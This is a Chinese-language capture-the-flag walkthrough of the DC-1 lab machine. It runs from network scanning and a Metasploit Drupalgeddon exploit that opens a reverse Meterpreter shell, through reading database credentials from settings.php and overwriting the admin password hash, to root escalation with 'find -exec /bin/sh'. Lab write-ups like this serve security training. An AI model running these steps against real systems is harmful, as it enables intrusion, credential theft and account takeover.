對DC-1靶機進行滲透測試
1.搭建滲透平臺
Kali 2018, DC-1靶機, VMWare虛擬機平臺
2.準備工作
使用nmap發現局域網中的主機
shell命令
nmap -sn 192.168.12.0/24
shell輸出
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-15 10:27 CST
Nmap scan report for 192.168.12.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:00 (VMware)
Nmap scan report for 192.168.12.129
Host is up (0.00026s latency).
MAC Address: 00:0C:29:BF:AE:30 (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.00012s latency).
MAC Address: 00:50:56:F0:BC:D6 (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 27.95 seconds
掃描到了4個存活的主機,192.168.12.1是物理機地址,192.168.12.128是本kali機器的地址,經過直接用瀏覽器訪問,得出192.168.12.129就是DC-1靶機的地址。DC-1的http頁面如下,網頁底部有Powered by Drupal,因此知道了這個網頁基於Drupal這個CMS框架。此外,沒有多餘的有價值的信息可以利用。
3.掃描端口
進一步掃描端口,在掃描192.168.11.129時發現瞭如下結果
shell命令
root@kali:~# nmap -p- -A -v 192.168.11.129
shell輸出
Nmap scan report for 192.168.12.129
Host is up (0.00047s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 41785/udp status
|_ 100024 1 56404/tcp status
56404/tcp open status 1 (RPC #100024)
掃描結果顯示開啓了4個端口,並且掃描出了http默認的80端口下存在robots.txt文件,我們嘗試直接訪問。在robots.txt中,發現了一些安裝/升級/許可證等信息文件。
文件:robots.txt(部分)
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
翻閱多個文件之後,在UPGRADE.txt中,有一些版本信息,推斷Drupal的版本應該是7,此外,沒有找到其他有價值的內容。
4.使用msfconsole掃描網站目錄
在robots.txt中獲取的信息太少,嘗試使用msfconsole中的目錄掃描器來掃描網站目錄。
shell命令
root@kali:~# msfconsole
msf5 > use auxiliary/scanner/http/dir_scanner
msf5 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.12.129 # 設置遠程主機地址
msf5 auxiliary(scanner/http/dir_scanner) > set THREADS 20 # 設置併發線程數量
msf5 auxiliary(scanner/http/dir_scanner) > show options
msf5 auxiliary(scanner/http/dir_scanner) > run # 開始掃描
shell輸出
Module options (auxiliary/scanner/http/dir_scanner):
Name Current Setting Required Description
---- --------------- -------- -----------
DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt no Path of word dictionary to use
PATH / yes The path to identify files
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.12.129 yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 20 yes The number of concurrent threads
VHOST no HTTP server virtual host
[*] Detecting error code
[*] Using code '404' as not found for 192.168.12.129
[+] Found http://192.168.12.129:80/.CVS/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/.../ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/0/ 200 (192.168.12.129)
[+] Found http://192.168.12.129:80/Admin/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/USER/ 200 (192.168.12.129)
[+] Found http://192.168.12.129:80/admin/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/batch/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/cgi-bin/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/icons/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/includes/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/misc/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/modules/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/node/ 200 (192.168.12.129)
[+] Found http://192.168.12.129:80/profiles/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/scripts/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/search/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/sites/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/themes/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/user/ 200 (192.168.12.129)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
很遺憾,掃描出來的頁面大多數都是403,幾個200的頁面也不能提供有價值的信息。
5.在msfconsole中查詢並嘗試針對Drupal的工具
shell命令
msf5 > search drupal
shell輸出
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
這些工具一個一個嘗試,首先嚐試第一個auxiliary/gather/drupal_openid_xxe,這個工具的描述是openID外部實體注入,嘗試之,不能正常工作。嘗試第二個auxiliary/scanner/http/drupal_views_user_enum,這是一個用戶枚舉工具,也不能正常工作。嘗試第三個exploit/multi/http/drupal_drupageddon,這是一個sql注入工具。
shell命令
msf5 > use exploit/multi/http/drupal_drupageddon
msf5 > set RHOSTS 192.168.12.129
msf5 > run
shell輸出
RHOSTS => 192.168.12.129
[*] Started reverse TCP handler on 192.168.12.128:4444
[*] Sending stage (38247 bytes) to 192.168.12.129
[*] Meterpreter session 1 opened (192.168.12.128:4444 -> 192.168.12.129:59507) at 2019-07-15 11:17:35 +0800
meterpreter >
成功了,ls一下,可以看到目錄下有一個flag1.txt,cat之。
shell命令
meterpreter > ls
meterpreter > cat flag1.txt
shell輸出(部分)
Every good CMS needs a config file - and so do you.
拿到了第一條提示:需要去找drupal的配置文件。百度一下drupal的配置文件默認位置位於sites/default/settings.php
shell命令
cd sites/default/
cat settings.php
shell輸出(部分)
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
得到了flag2和本機mysql的一組用戶名和密碼,所以考慮進入數據庫看看有沒有可用的信息。
6.數據庫操作
輸入mysql -udbuser -p,提示命令無效,輸入shell並回車,切換了外殼,再次鍵入mysql -udbuser -p,輸入密碼就能進入mysql。進去之後發現一個問題,終端上面不能正常回顯信息,儘管如此,還是拿到了經過加密的用戶名和密碼。
Mysql console輸出
*************************** 1. row ***************************
uid: 0
name:
pass:
mail:
theme:
signature:
signature_format: NULL
created: 0
access: 0
login: 0
status: 0
timezone: NULL
language:
picture: 0
init:
data: NULL
*************************** 2. row ***************************
uid: 1
name: admin
pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
mail: admin@example.com
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: admin@example.com
data: b:0;
*************************** 3. row ***************************
uid: 2
name: Fred
pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
mail: fred@example.org
theme:
signature:
signature_format: filtered_html
created: 1550581952
access: 1550582225
login: 1550582225
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: fred@example.org
data: b:0;
加密了之後的密文解密相當困難,但是我們可以倒過來考慮,將一個密碼加密成密文之後寫入數據庫,於是需要知道加密算法,這時候可以考慮猜測加密方法一個個試,但這裏不這樣做(實際上猜測也是不可靠的,因爲誰都會想到這些比較通用的加密算法,因此在設計的時候可能會有多種加密算法組合使用,這些算法中也可能有開發人員自己設計的),我在trupal的官網https://www.drupal.org/node/1023428上找到了truple的加密腳本位置./script/password-hash.sh,直接使用這個腳本進行加密。
shell命令
php .\scripts\password-hash.sh 123456
shell輸出
password: 123456 hash: $S$DRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu
這裏不能進入到scripts目錄裏面執行這個腳本,進入到裏面執行會報錯。打開這個腳本查看就能知道原因是這個腳本需要其他文件參與執行,而腳本中寫的路徑是相對於網站根的相對路徑,進入scripts目錄執行會找不到文件。
得到密文之後將其寫入數據庫,這裏我執行到update時遇到了一些問題,總是報錯,最終我將這個句子拆分輸入完成了插入動作。
Mysql console命令
mysql -udbuser -pR0ck3t
use drupaldb
update users set pass=`$S$DRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu` where uid=1;
select * from users\G;
Mysql console輸出(部分)
*************************** 2. row ***************************
uid: 1
name: admin
pass: $S$DRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu
mail: admin@example.com
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: admin@example.com
data: b:0;
7.從網頁登陸admin賬戶
使用設置好的密碼:123456,登陸admin賬戶,在content頁面發現了flag3
於是打開查看
flag3內容
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
提示我們特殊的權限權限有助於發現隱藏內容,這裏提到了shadow這個單詞,於是立即想到/etc/passwd,先打開看看再說
8. 得到flag3之後的操作
shell命令
cat /etc/passwd
shell輸出
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
直接告訴了我們flag4的位置,打開看看
Shell命令
cd /home/flag4
ls
cat flag4.txt
shell輸出(flag4.txt的內容)
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
這句話告訴我們需要提升權限。而根據flag3,find這個命令可能是以root權限執行的,我們隨便find一個內容,而-exec可以作爲find的一個選項執行命令。
9. 使用find命令提升權限
shell命令
find ./ aaa -exec '/bin/sh' \;
whoami
cd /root
ls
cat thefinalflag.txt
shell輸出
root
thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
得到root權限和最終flag,遊戲結束。
後記
有幾個關鍵點
-
使用
msfconsole中的exploit/multi/http/drupal_drupageddon工具,不必深究這個工具是如何得到shell和建立與本機的連接的 -
find命令配合-exec選項提權;在執行這條指令必須指定外殼爲/bin/sh,經過嘗試/bin/bash等其他外殼拿到的不是root權限。 -
使用
exploit/multi/http/drupal_drupageddon建立連接並鍵入shell之後回去看不見命令提示符或者無法正常回顯等問題,可以在python中開啓反向終端終端進行操作(無需root):
python -c 'import pty;pty.spawn("/bin/sh")'